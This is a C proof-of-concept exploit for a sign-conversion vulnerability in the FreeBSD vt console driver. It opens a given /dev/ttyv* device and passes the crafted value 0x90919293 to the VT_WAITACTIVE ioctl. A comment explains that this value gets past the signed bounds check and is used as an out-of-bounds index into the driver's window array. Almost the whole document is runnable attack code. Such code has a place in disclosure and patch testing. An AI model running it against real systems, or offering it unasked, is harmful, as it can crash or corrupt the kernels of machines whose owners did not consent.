#include <stdio.h>#include <sys/consio.h>#include <sys/ioctl.h>#include <f

1. #include <stdio.h>
2. #include <sys/consio.h>
3. #include <sys/ioctl.h>
4. #include <fcntl.h>
5. #include <stdlib.h>
6. #include <unistd.h>
7.  
8. int main(int argc, char **argv){
9. int fd;
10.  
11. printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");
12.  
13. if (argc < 2){
14. printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
15. printf("\nExample: ./poc_vt /dev/ttyv1\n\n");
16. exit(1);
17. }
18.  
19. fd = open(argv[1], O_RDONLY);
20. if (fd == -1){
21. perror("open");
22. exit(1);
23. }
24.  
25. /* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the
26. * (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12).
27. * This value will be ultimately used as an index to access the vd->vd_windows array.
28. */
29. if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){
30. perror("ioctl");
31. }
32.  
33. close(fd);
34. return 0;
35. }